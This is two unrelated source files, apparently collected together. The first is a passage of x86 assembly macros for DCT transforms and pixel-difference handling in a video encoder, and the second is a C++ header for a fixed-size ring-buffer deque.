psub%1 m%2, %4 ; %2: %2>>1-%3
%endif
%endmacro
%macro DCT4_1D 5
%ifnum %5
SUMSUB_BADC w, %4, %1, %3, %2, %5
SUMSUB_BA w, %3, %4, %5
SUMSUB2_AB w, %1, %2, %5
SWAP %1, %3, %4, %5, %2
%else
SUMSUB_BADC w, %4, %1, %3, %2
SUMSUB_BA w, %3, %4
mova [%5], m%2
SUMSUB2_AB w, %1, [%5], %2
SWAP %1, %3, %4, %2
%endif
%endmacro
%macro IDCT4_1D 6-7
%ifnum %6
SUMSUBD2_AB %1, %3, %5, %7, %6
; %3: %3>>1-%5 %5: %3+%5>>1
SUMSUB_BA %1, %4, %2, %7
; %4: %2+%4 %2: %2-%4
SUMSUB_BADC %1, %5, %4, %3, %2, %7
; %5: %2+%4 + (%3+%5>>1)
; %4: %2+%4 - (%3+%5>>1)
; %3: %2-%4 + (%3>>1-%5)
; %2: %2-%4 - (%3>>1-%5)
%else
%ifidn %1, w
SUMSUBD2_AB %1, %3, %5, [%6], [%6+16]
%else
SUMSUBD2_AB %1, %3, %5, [%6], [%6+32]
%endif
SUMSUB_BA %1, %4, %2
SUMSUB_BADC %1, %5, %4, %3, %2
%endif
SWAP %2, %5, %4
; %2: %2+%4 + (%3+%5>>1) row0
; %3: %2-%4 + (%3>>1-%5) row1
; %4: %2-%4 - (%3>>1-%5) row2
; %5: %2+%4 - (%3+%5>>1) row3
%endmacro
%macro LOAD_DIFF 5-6 1
%if HIGH_BIT_DEPTH
%if %6 ; %5 aligned?
mova %1, %4
psubw %1, %5
%elif cpuflag(avx)
movu %1, %4
psubw %1, %5
%else
movu %1, %4
movu %2, %5
psubw %1, %2
%endif
%else ; !HIGH_BIT_DEPTH
movh %1, %4
movh %2, %5
%ifidn %3, none
punpcklbw %1, %2
punpcklbw %2, %2
%else
punpcklbw %1, %3
punpcklbw %2, %3
%endif
psubw %1, %2
%endif ; HIGH_BIT_DEPTH
%endmacro
%macro LOAD_DIFF8x4 8 ; 4x dst, 1x tmp, 1x mul, 2x ptr
%if BIT_DEPTH == 8 && cpuflag(ssse3)
movh m%2, [%8+%1*FDEC_STRIDE]
movh m%1, [%7+%1*FENC_STRIDE]
punpcklbw m%1, m%2
movh m%3, [%8+%2*FDEC_STRIDE]
movh m%2, [%7+%2*FENC_STRIDE]
punpcklbw m%2, m%3
movh m%4, [%8+%3*FDEC_STRIDE]
movh m%3, [%7+%3*FENC_STRIDE]
punpcklbw m%3, m%4
movh m%5, [%8+%4*FDEC_STRIDE]
movh m%4, [%7+%4*FENC_STRIDE]
punpcklbw m%4, m%5
pmaddubsw m%1, m%6
pmaddubsw m%2, m%6
pmaddubsw m%3, m%6
pmaddubsw m%4, m%6
%else
LOAD_DIFF m%1, m%5, m%6, [%7+%1*FENC_STRIDEB], [%8+%1*FDEC_STRIDEB]
LOAD_DIFF m%2, m%5, m%6, [%7+%2*FENC_STRIDEB], [%8+%2*FDEC_STRIDEB]
LOAD_DIFF m%3, m%5, m%6, [%7+%3*FENC_STRIDEB], [%8+%3*FDEC_STRIDEB]
LOAD_DIFF m%4, m%5, m%6, [%7+%4*FENC_STRIDEB], [%8+%4*FDEC_STRIDEB]
%endif
%endmacro
%macro STORE_DCT 6
movq [%5+%6+ 0], m%1
movq [%5+%6+ 8], m%2
movq [%5+%6+16], m%3
movq [%5+%6+24], m%4
movhps [%5+%6+32], m%1
movhps [%5+%6+40], m%2
movhps [%5+%6+48], m%3
movhps [%5+%6+56], m%4
%endmacro
%macro STORE_IDCT 4
movhps [r0-4*FDEC_STRIDE], %1
movh [r0-3*FDEC_STRIDE], %1
movhps [r0-2*FDEC_STRIDE], %2
movh [r0-1*FDEC_STRIDE], %2
movhps [r0+0*FDEC_STRIDE], %3
movh [r0+1*FDEC_STRIDE], %3
movhps [r0+2*FDEC_STRIDE], %4
movh [r0+3*FDEC_STRIDE], %4
%endmacro
%macro LOAD_DIFF_8x4P 7-11 r0,r2,0,1 ; 4x dest, 2x temp, 2x pointer, increment, aligned?
LOAD_DIFF m%1, m%5, m%7, [%8], [%9], %11
LOAD_DIFF m%2, m%6, m%7, [%8+r1], [%9+r3], %11
LOAD_DIFF m%3, m%5, m%7, [%8+2*r1], [%9+2*r3], %11
LOAD_DIFF m%4, m%6, m%7, [%8+r4], [%9+r5], %11
%if %10
lea %8, [%8+4*r1]
lea %9, [%9+4*r3]
%endif
%endmacro
; 2xdst, 2xtmp, 2xsrcrow
%macro LOAD_DIFF16x2_AVX2 6
pmovzxbw m%1, [r1+%5*FENC_STRIDE]
pmovzxbw m%2, [r1+%6*FENC_STRIDE]
pmovzxbw m%3, [r2+(%5-4)*FDEC_STRIDE]
pmovzxbw m%4, [r2+(%6-4)*FDEC_STRIDE]
psubw m%1, m%3
psubw m%2, m%4
%endmacro
%macro DIFFx2 6-7
movh %3, %5
punpcklbw %3, %4
psraw %1, 6
paddsw %1, %3
movh %3, %6
punpcklbw %3, %4
psraw %2, 6
paddsw %2, %3
packuswb %2, %1
%endmacro
; (high depth) in: %1, %2, min to clip, max to clip, mem128
; in: %1, tmp, %3, mem64
%macro STORE_DIFF 4-5
%if HIGH_BIT_DEPTH
psrad %1, 6
psrad %2, 6
packssdw %1, %2
paddw %1, %5
CLIPW %1, %3, %4
mova %5, %1
%else
movh %2, %4
punpcklbw %2, %3
psraw %1, 6
paddsw %1, %2
packuswb %1, %1
movh %4, %1
%endif
%endmacro
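; build a pshufb mask from 8 word indices: each index expands to its byte
; pair, and an index >= 0x80 emits bytes with the high bit set, which pshufb
; zeroes out.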
%macro SHUFFLE_MASK_W 8
%rep 8
%if %1>=0x80
db %1, %1
%else
db %1*2
db %1*2+1
%endif
%rotate 1
%endrep
%endmacro
; instruction, accum, input, iteration (zero to swap, nonzero to add)
%macro ACCUM 4
%if %4
%1 m%2, m%3
%else
SWAP %2, %3
%endif
%endmacro
; IACA support
%macro IACA_START 0
mov ebx, 111
db 0x64, 0x67, 0x90
%endmacro
%macro IACA_END 0
mov ebx, 222
db 0x64, 0x67, 0x90
%endmacro
|
#pragma once
#include <cstdint>
#include <type_traits>
#include <utility>
namespace higanbana
{
template<typename T, size_t N>
class FixedSizeDeque
{
size_t m_count = 0;
size_t m_head = 0;
T m_arr[N] = {};
size_t index_back() {
//assert(m_count > 0);
return (m_head + m_count-1) % N;
}
size_t index_front() {
//assert(m_count > 0);
return (m_head) % N;
}
public:
void push_back(T value) {
m_count++;
m_arr[index_back()] = value;
}
void push_front(T value) {
if (m_head == 0)
m_head = N;
m_head--;
m_arr[index_front()] = value;
m_count++;
}
T& back() {
return m_arr[index_back()];
}
T& front() {
return m_arr[index_front()];
}
void pop_back() {
m_arr[index_back()] = T{}; // reset the slot; an explicit ~T() would leave a destroyed object in the array
m_count--;
}
void pop_front() {
m_arr[index_front()] = T{}; // reset the slot; see pop_back
m_count--;
m_head++;
if (m_head == N)
m_head = 0;
}
bool empty() const { return m_count==0; }
size_t size() const { return m_count; }
};
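// Usage sketch: a fixed-capacity ring buffer with deque semantics. Note there
// is no overflow check, so pushing more than N elements wraps and overwrites.
//   FixedSizeDeque<int, 4> q;
//   q.push_back(1); q.push_back(2); q.push_front(0);
//   // q.front() == 0, q.back() == 2, q.size() == 3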
} |